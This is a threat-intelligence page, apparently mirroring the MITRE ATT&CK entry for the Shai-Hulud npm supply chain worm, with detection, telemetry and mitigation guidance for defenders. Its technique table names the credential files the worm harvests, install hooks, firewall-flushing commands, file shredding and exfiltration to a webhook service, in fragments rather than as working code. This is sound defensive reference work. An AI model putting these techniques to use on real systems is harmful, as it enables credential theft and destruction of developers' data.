S9008: Shai-Hulud
Shai-Hulud is a supply chain worm, first reported in September 2025, that spreads through code repositories, including GitHub and NPM packages. It exploits CI/CD pipeline dependencies to propagate to victims and poisons the supply chain by publishing malicious packages. Once inside a victim environment, Shai-Hulud steals credentials and access tokens from compromised repository accounts and exfiltrates them to attacker-controlled servers via encoded GitHub Actions workflows.[1][2][3][4][5][6][7]
Analyst context for executives and security teams
Shai-Hulud matters because it targets the software supply chain rather than only endpoints. The ATT&CK description identifies it as a worm that spreads through code repositories, GitHub, NPM packages, and CI/CD dependencies, then steals credentials and access tokens and exfiltrates them through encoded GitHub Actions workflows. For executives and security leaders, the practical risk is loss of trust in build pipelines, package dependencies, and repository identities that can affect software delivery, incident scope, and customer assurance.
Executive priority
Prioritize validation of software supply chain controls: repository account security, CI/CD secret handling, package publishing governance, and evidence that build workflows are monitored. This behavior can turn a compromised developer or package dependency into a broader business continuity and compliance problem because stolen tokens may allow follow-on access across repositories, SaaS services, and build infrastructure. Leaders should ask whether the organization can rapidly identify affected packages, revoke exposed tokens, pause unsafe publishing, and prove control effectiveness to auditors or customers.
Technical view
SOC, detection engineering, and IR teams should treat Shai-Hulud as a cross-platform software supply chain threat affecting Linux, Windows, and SaaS environments. Because ATT&CK provides no official detection text or tactic mapping for this object, teams should validate coverage around the behaviors in the description: suspicious repository account activity, unexpected GitHub Actions workflow creation or modification, encoded workflow content, anomalous CI/CD dependency execution, unexpected NPM/package publishing, and outbound connections from build automation to attacker-controlled or unapproved destinations. IR playbooks should include token discovery, revocation, repository review, package integrity checks, and CI/CD workflow containment.
Likely telemetry
- Repository audit logs for account activity, token usage, workflow changes, branch/tag changes, and package publishing events
- CI/CD pipeline logs from GitHub Actions or equivalent workflow systems, including job definitions, environment variables, secrets access, and runner activity
- SaaS identity and access logs for repository accounts, service accounts, access tokens, and unusual authentication patterns
- Package registry logs for NPM or internal package publication, version changes, maintainer changes, and dependency updates
- Endpoint and build runner telemetry from Linux and Windows systems used in development or CI/CD processes
Detection direction
- Validate that repository and CI/CD audit logs are collected with enough detail to reconstruct who changed workflows, published packages, and used tokens.
- Tune detections for unusual GitHub Actions workflow creation, encoded script content, unexpected secrets access, and workflow changes made by accounts that do not normally maintain automation.
- Monitor for package publishing from unusual accounts, locations, runners, or time windows, while accounting for legitimate release automation to reduce false positives.
- Correlate repository events with SaaS identity logs and build runner telemetry; single-source alerts may miss supply chain propagation across accounts, packages, and pipelines.
- Review blind spots around ephemeral CI/CD runners, unmanaged developer tokens, personal access tokens, third-party actions, and dependencies pulled during builds.
Mitigation priorities
- Inventory critical repositories, CI/CD workflows, package publishing rights, service accounts, and access tokens before an incident.
- Enforce least privilege and strong governance for repository accounts, package maintainers, CI/CD secrets, and publishing workflows.
- Reduce token exposure by rotating secrets, limiting token scope and lifetime, and preventing unnecessary secrets access in build jobs.
- Require review and approval for workflow changes, package publishing changes, and dependency updates in sensitive projects.
- Use secret scanning, dependency review, and package integrity checks to identify exposed credentials and suspicious package changes.
Analyst notes and limits
The supplied ATT&CK object describes Shai-Hulud as a supply chain worm involving repositories, GitHub, NPM packages, CI/CD dependencies, credential and token theft, and exfiltration through encoded GitHub Actions workflows. No ATT&CK tactics, aliases, official detection text, external reference details, or relationship mappings were supplied, so this take focuses on defensible validation areas rather than specific ATT&CK technique coverage.
This summary is limited to the supplied STIX fields and description. It does not establish current activity, attribution, prevalence, customer exposure, or guaranteed detection. Local conclusions require environment-specific evidence from repository platforms, CI/CD systems, package registries, identity logs, build runners, and network telemetry.
Shai-Hulud
Shai-Hulud is a supply chain worm, first reported in September 2025, that spreads through code repositories, including GitHub and NPM packages. It exploits CI/CD pipeline dependencies to propagate to victims and poisons the supply chain by publishing malicious packages. Once inside a victim environment, Shai-Hulud steals credentials and access tokens from compromised repository accounts and exfiltrates them to attacker-controlled servers via encoded GitHub Actions workflows.[1][2][3][4][5][6][7]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027 | Obfuscated Files or Information | Shai-Hulud has utilized double-base64 encoding to store stolen secrets within the Github Action Logs within the victim account.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationSocket Shai-Hulud Trufflehog September 2025 Shai-Hulud has also leveraged three layers of base64 encoding of exfiltrated data for anti-forensic purposes.CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1548.003 | Sudo and Sudo Caching Sub-technique | Shai-Hulud has attempted to gain root access by leveraging `sudo` and `/etc/sudoers.d`.CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1543.002 | Systemd Service Sub-technique | Shai-Hulud has stopped `systemd-resolved` in order to manipulate DNS and firewalls.CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1678 | Delay Execution | Shai-Hulud has delayed execution of its larger payloads by forking itself into background process.CitationPalo Alto Unit 42 Shai-Hulud November 2025 |
| Enterprise | T1677 | Poisoned Pipeline Execution | Shai-Hulud has also leveraged GitHub actions from stolen accounts in order to create a malicious Github workflow within `.github/workflows/discussion.yaml`.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1485 | Data Destruction | Shai-Hulud has destroyed the victim’s home directory by overwriting and deleting every writable file within the user's home folder.CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025 Shai-Hulud has also utilized the `shred` command on Linux devices.CitationMicrosoft Shai-Hulud December 2025 |
| Enterprise | T1552.001 | Credentials In Files Sub-technique | Shai-Hulud has gathered sensitive data stored in the Node.JS file `process.env` to include credentials and API keys.CitationAikido Shai-Hulud September 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 Shai-Hulud has harvested credentials stored in config files and credential files in victim environments to include `~/.aws/credentials`, `application_default_credentials.json`, and `azureProfile.json`.CitationNetskope Shai-Hulud November 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 Shai-Hulud has also targeted credentials and tokens stored in NPM files `.npmrc` and GitHub config files.CitationNetskope Shai-Hulud November 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 |
| Enterprise | T1685 | Disable or Modify Tools | Shai-Hulud has replaced DNS configuration from `/tmp/resolved.conf` in order to gain control of network-level control within CI environments and has flushed iptables rules using `sudo iptables -F OUTPUT` and `sudo iptables -F DOCKER-USER`.CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1195.001 | Compromise Software Dependencies and Development Tools Sub-technique | Shai-Hulud has published itself on compromised code repository maintainers within infected packages in attempts to propagate to other victims.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationMicrosoft Shai-Hulud December 2025CitationSocket Shai-Hulud November 2025 Shai-Hulud has also modified versions of code packages.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1105 | Ingress Tool Transfer | Shai-Hulud has downloaded packages from code repositories.CitationAikido Shai-Hulud September 2025CitationWiz Shai-Hulud September 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 Shai-Hulud has also downloaded and executed the secrets-discovery tool TruffleHog to gather sensitive data.CitationNetskope Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationMicrosoft Shai-Hulud December 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 |
| Enterprise | T1059.004 | Unix Shell Sub-technique | Shai-Hulud has utilized Linux shell commands to modify configuration files.CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1078.004 | Cloud Accounts Sub-technique | Shai-Hulud has leveraged compromised accounts to log into cloud services to access cloud hosted repositories.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationMicrosoft Shai-Hulud December 2025 |
| Enterprise | T1555.006 | Cloud Secrets Management Stores Sub-technique | Shai-Hulud has gathered secrets from AWS Secrets and GCP Secret Manager.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025 Shai-Hulud has also gathered data from Azure Key Vault.CitationNetskope Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1564.011 | Ignore Process Interrupts Sub-technique | Shai-Hulud has suppressed NPM warnings by silently exiting through the use of the NPM success code that has a setting that all errors exit with `code 0`.CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1119 | Automated Collection | Shai-Hulud has the ability to automatically collect host data, secrets, system information, and endpoints.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationMicrosoft Shai-Hulud December 2025 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Shai-Hulud has utilized curl to install Bun over HTTPS.CitationMicrosoft Shai-Hulud December 2025 |
| Enterprise | T1593.003 | Code Repositories Sub-technique | Shai-Hulud has the ability to search open sites and code repositories for compromised credentials.CitationAikido Shai-Hulud September 2025CitationMicrosoft Shai-Hulud December 2025 Shai-Hulud has discovered packages associated with compromised accounts.CitationNetskope Shai-Hulud November 2025 Shai-Hulud has also searched code repositories for other compromised repositories that include predefined parameters or markers to include “Second Coming” combined with an 18-character alphanumeric string.CitationNetskope Shai-Hulud November 2025 |
| Enterprise | T1567.001 | Exfiltration to Code Repository Sub-technique | Shai-Hulud has created a repository named `Shai-Hulud` under the compromised account that commits a JSON dump that contains system information, environment variables and collected secrets.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025 Shai-Hulud has also posted stolen credentials to public GitHub repositories.CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationMicrosoft Shai-Hulud December 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 |
| Enterprise | T1036.009 | Break Process Trees Sub-technique | Shai-Hulud has augmented its installation process by having its original install process exit cleanly to provide the user with the illusion that the service is installed normally.CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1528 | Steal Application Access Token | Shai-Hulud has stolen access tokens and API tokens from with CI/CD pipeline solutions and repositories.CitationNetskope Shai-Hulud November 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1098 | Account Manipulation | Shai-Hulud has modified GitHub account settings for private repositories and changed them to public.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationMicrosoft Shai-Hulud December 2025 |
| Enterprise | T1553 | Subvert Trust Controls | Shai-Hulud has suppressed victim NPM warnings using `process[“exit’](0x0);` which results in having all errors exit with code 0.CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Shai-Hulud has masqueraded as a legitimate Bun installer.CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Shai-Hulud has used POST to exfiltrate secrets from the victim environment to an attacker-controlled URL.CitationAikido Shai-Hulud September 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025 |
| Enterprise | T1546.016 | Installer Packages Sub-technique | Shai-Hulud has inserted a new lifecycle hook to include `postinstall`.CitationAikido Shai-Hulud September 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationSocket Shai-Hulud November 2025 Shai-Hulud has also leveraged the NPM lifecycle hook `preinstall`.CitationNetskope Shai-Hulud November 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationMicrosoft Shai-Hulud December 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1608.001 | Upload Malware Sub-technique | Shai-Hulud has published malicious gzip-compressed tarball (.tgz) following modification of packages within compromised accounts.CitationAikido Shai-Hulud September 2025CitationSocket Shai-Hulud Trufflehog September 2025 Shai-Hulud has also modified packages within compromised accounts.CitationNetskope Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025 |
| Enterprise | T1567.004 | Exfiltration Over Webhook Sub-technique | Shai-Hulud has exfiltrated repository secrets to `webhook[.]site`.CitationWiz Shai-Hulud September 2025 |
| Enterprise | T1213.003 | Code Repositories Sub-technique | Shai-Hulud has downloaded existing packages from code repositories and extracted data stored within them.CitationAikido Shai-Hulud September 2025 |
| Enterprise | T1059.001 | PowerShell Sub-technique | Shai-Hulud has utilized PowerShell `Invoke-WebRequest` to download and install the malicious payload.CitationMicrosoft Shai-Hulud December 2025 |
| Enterprise | T1552.005 | Cloud Instance Metadata API Sub-technique | Shai-Hulud has queried the AWS and GCP metadata endpoints for instances and service credentials.CitationAikido Shai-Hulud September 2025 |
| Enterprise | T1082 | System Information Discovery | Shai-Hulud has gathered victim system information.CitationAikido Shai-Hulud September 2025CitationSocket Shai-Hulud November 2025 |
| Enterprise | T1550.001 | Application Access Token Sub-technique | Shai-Hulud has leveraged captured valid NPM tokens to enumerate and update packages on compromised accounts.CitationAikido Shai-Hulud September 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 Shai-Hulud has also utilized stolen GitHub access tokens to access compromised accounts.CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 |
| Enterprise | T1059.007 | JavaScript Sub-technique | Shai-Hulud has used JavaScript to create JSON file output and run scripts using node.js.CitationAikido Shai-Hulud September 2025CitationNetskope Shai-Hulud November 2025CitationPalo Alto Unit 42 Shai-Hulud November 2025CitationWiz Shai-Hulud September 2025CitationMicrosoft Shai-Hulud December 2025CitationSocket Shai-Hulud November 2025CitationSocket Shai-Hulud Trufflehog September 2025 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 972106ec1370… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Palo Alto Unit 42 Shai-Hulud November 2025
Justin Moore. (2025, November 25). "Shai-Hulud" Worm Compromises npm Ecosystem in Supply Chain Attack (Updated November 26). Retrieved April 9, 2026.
Open source URL -
[2]
Microsoft Shai-Hulud December 2025
Microsoft Defender Security Team. (n.d.). Shai-Hulud 2.0: Guidance for detecting, investigating, and defending against the supply chain attack. Retrieved April 9, 2026.
Open source URL -
[3]
Socket Shai-Hulud November 2025
Socket Research Team. (2025, November 24). Shai Hulud Strikes Again (v2). Retrieved April 9, 2026.
Open source URL -
[4]
Socket Shai-Hulud Trufflehog September 2025
Socket Research Team. (2025, September 15). Popular Tinycolor npm Package Compromised in Supply Chain Attack Affecting 40+ Packages. Retrieved April 9, 2026.
Open source URL -
[5]
Aikido Shai-Hulud September 2025
Charlie Eriksen. (2025, September 16). S1ngularity/nx attackers strike again. Retrieved April 9, 2026.
Open source URL -
[6]
Netskope Shai-Hulud November 2025
Gianpietro Cutolo. (2025, November 26). Shai-Hulud 2.0: Aggressive, Automated, and Fast Spreading. Retrieved April 9, 2026.
Open source URL -
[7]
Wiz Shai-Hulud September 2025
Merav Bar, Rami McCarthy, Barak Sharoni. (2025, September 16). Shai-Hulud: Ongoing Package Supply Chain Worm Delivering Data-Stealing Malware. Retrieved April 9, 2026.
Open source URL -
[8]
mitre-attack S9008Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.